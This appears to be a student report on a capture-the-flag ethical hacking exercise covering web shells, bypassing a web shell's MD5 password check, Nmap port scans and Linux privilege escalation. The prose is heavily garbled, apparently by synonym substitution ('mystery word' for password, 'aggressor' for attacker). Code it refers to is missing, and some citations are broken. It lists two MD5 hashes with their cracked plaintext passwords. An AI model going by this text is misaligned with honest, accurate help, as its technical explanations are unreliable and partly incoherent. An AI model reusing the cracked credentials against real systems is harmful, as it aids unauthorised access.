Report On Ethical Hacking And Defense Using Case Study
Web Shells and Their Uses
Main objective of this project is to make the report for ethical hacking and defence with the given case study. The area cover in this report includes as follows- The user requires to penetrate the given system and achieve the root level privileges. Generally, this project is divided into five flags, where the first flag needs to examine the content of the web server, to determine the username and password for the admin. The flag is required to know about the web shells. The third flagsrequires to crack the password. The fourth flags requires determining the user entered the wrong password on the system, where the TCP port scanner is used. The fifth flag is required to learn the basic escalation of Linux privilege. It also defines the methodology and testing of the log.
Here, the user quires to install the Virtual machine and also installs the provided case study on the virtual machine. This process is demonstrated below(“An Introduction to Web-shells | Acunetix”, 2018).
Generally, the web server needs to store the contents in a specific HTML reports which is related to web server resources such as textual styles, pictures, recordings, java scripts documents and CSS templates. These documents are saved exclusively in the PC, anyway it’s unquestionably useful to store them all on a submitted web server that is reliably running continuously when connected with the Internet, and then it has comparative IP address continually and is stored by an untouchable provider(“Basic Linux Privilege Escalation”, 2018).
In cybercrime, the web shells are generally the neglected factor and it doesn’t grasp the attention level of phishing or malware. But, the web shells that are effectively engineered are now delivering highly presentable andrefined toolkits for various crimes, along with the facilities to crack the password, DDoSelevating the privileges,phishing, then the investigation of network and spamming, which is not only offered by the web based user interface, but it also accepts the commands for the botnet. With just a click, various shells provide botnet creation, which launches the standalone processes that either establish connection with the command and control server or by insecure TCP connectionit listen to the commands.For finding potentially exploitable services, some let to perform the port scan, whereas others let the fraudsters to schedule the DoS (denial of service) attacks. There exists shells which are committed to sendbulk spam emails, then they test the credentials that are stolen against the famous websites (For example, PayPal, Amazon and so on.), password cracking and defacing the websitesautomatically. Where so many powerful features exists, it is unsurprising that how the web shells that are famous are involved with the cyber criminals.A web-shell is a noxious substance used by an aggressor with the reason to uplift and keep up steady access on a starting negotiated web application. Web-shells can’t strike or experience remote incapability, so it is constantly the second step of atrap. The attacker can abuse the general vulnerabilities (Bock, 2016).
Types of Attacks Using Web Shells
The web-shell or aberrant access is related with a C&C server from which it can take bearings on what rules to execute. This setup is typically used in DDoS attacks, which require clearing proportions of transmission limit. For this circumstance, the aggressor does not have any eagerness for harming, or taking anything off-of the structure whereupon the web shell was passed on. Or maybe, they will fundamentally use its advantages for at whatever point is required (Cengage Learning, 2017).
Propelling and Pivoting Attacks
A web-shell can be used for pivoting inside or outside the framework. The attacker should need to screen the framework development on the structure, check the internal framework to discover live has, and list firewalls and switches inside the framework. This methodology can take days, even months, commonly in light of the way that an assailant regularly attempts to remain under the radar, and draw negligible proportion of thought possible. Once an attacker has decided access, they can serenely make their moves (“Circumventing authentication of a webshell”, 2018).
Consistent Remote Access
A web-shell generally contains anindirect access which empowers an attacker to remotely get to and possibly, control a server at whatever point. This would save the assailant the trouble of manhandling a weakness each time access to the exchanged off server is required. An attacker may similarly settle the shortcoming themselves, remembering the ultimate objective to ensure that no one else will mishandle that frailty. In this way, the aggressor can remain under the radar and avoid any coordinated effort with an executive, while so far getting a comparative result.
Escalation of Privileges
Until the server is misconfigured, the web-shell keeps running the web server, with the permission of the user that are limited. With the help of the web-shell, the attacker could possibly try to conduct privilege escalation attacks,where the system is exploited with local vulnerabilities for assuming it as the root privileges, which in Linux and other UNIX-based operating systems, refers to ‘super-user.’
By accessing the root account, the attacker could do anything in the system. It can include installation of the software, the attacker could even change the permissions, then he/ she could even add or remove the users, passwords could be stolen, the emails could be read and so on.
Exactly when a webpage is hacked, the assailant routinely leaves an auxiliary section or web shell to have the ability to successfully get to the website later on. These are frequently confused to avoid recognizable proof, and need confirmation so simply the attacker can get to the site. In this post I am going to deobfuscate a web shell and show how the affirmation can be evaded when you have the source code yet not the mystery word(Engebretson, 2013).
Privilege Escalation
Deobfuscating the web shell
The preg_replace has three disputes, the regex, the substitution and the subject. Since the regex has the e modifier, it will evaluate anything in the substitution as PHP code. This refers to going with the code(“What are web shells – Tutorial”, 2018):
Physically changing over this string would be a touch of work, so we let PHP do it:
Bypassing check
The $auth_pass in the main code starting suggested where, there would be an approval on the web shell. The course of action of $auth_pass, 32 hexadecimal characters, suggest that it is a MD5 of the plaintext mystery word. As the wellspring of the web shell is present, it is possible to carry out the following(Ethical hacking and countermeasures, 2017):
Split a few passwords,
Hash Password
64a113a4ccc22cffb9d2f75b8c19e333 cmonqwe123#@!
9e4bf26d87b7e8b6b66b0a2305f67184 lex1312
Port checking is a technique used to perceive if a port on the target is either open or closed; the port can be open when there is an organization that utilizesa specific port to talk with various systems. This is the inspiration driving whywhen a port is open it is possible to over the long haul perceive what kind of organization uses it by sending phenomenally made packages to the target. When we know the target IP address we can dispatch the port checking ambush. Obviously,when no decision is picked, Nmap runs a TCP SYN Scan generally called Stealth Scan(“Port Scanning with Nmap”, 2018).Regardless of whether this kind of scan is the default one, the “- sS” parameter we can be used to set it up the pursued with the objective’s IP address (“TCP Port Scan with Nmap |”, 2018):
TCP connect scan is the default TCP filter compose when SYN examine isn’t a choice. This is the situation when a client does not have simple packet benefits. Rather than composing simple packets as most other scan composes do, Nmap asks the basic working framework to set up an association with the objective machine and port by issuing the interface framework call. This is a similar abnormal state framework call that internet browsers, P2P customers, and most other system empowered applications use to set up an association. It is a piece of a programming interface known as the Berkeley Sockets API. As opposed to peruse crude bundle reactions off the wire, Nmap utilizes this API to acquire status data on every association endeavour.
In the fifth flag, the basic Linux privilege escalation such as Operating System, Applications & Services, Communications & Networking, Confidential Information & Users, File Systems and Preparation & Finding Exploit Codeare learnt (“UDP Port Scan with Nmap |”, 2018).
The primary objective of this project is to make the report for ethical hacking and defence with the given case study. Here, user requires to penetrate the given system and achieve the root level privileges. Generally, this project is divided into five flags. From the discussion it is observed that, the first flag effectivelysurvey the web server content, to determine the username and password for the admin. The second flag is required to know about the web shells. The third flag successfully crack the password. The fourth flags successfully determined the user entered the wrong password on the system, where the TCP port scanner is used. The fifth flag is used for learning the basic escalation of Linux privilege. In future, we can crack the password by using the ncrack tool, because this tool provides effective password cracking facility.
An Introduction to Web-shells | Acunetix. (2018). Retrieved from
Basic Linux Privilege Escalation. (2018). Retrieved from and Pivoting Attacks 6). Ethical Hacking: Overview. [Carpinteria, Calif.]:
Cengage Learning. (2017). Ethical hacking and countermeasures. Boston, MA.
Circumventing authentication of a webshell. (2018). Retrieved from
Engebretson, P. (2013). The basics of hacking and penetration testing. Waltham, MA: Syngress/Elsevier.
Port Scanning with Nmap. (2018). Retrieved from
TCP Port Scan with Nmap | (2018). Retrieved from
UDP Port Scan with Nmap | (2018). Retrieved from
What are web shells – Tutorial. (2018). Retrieved from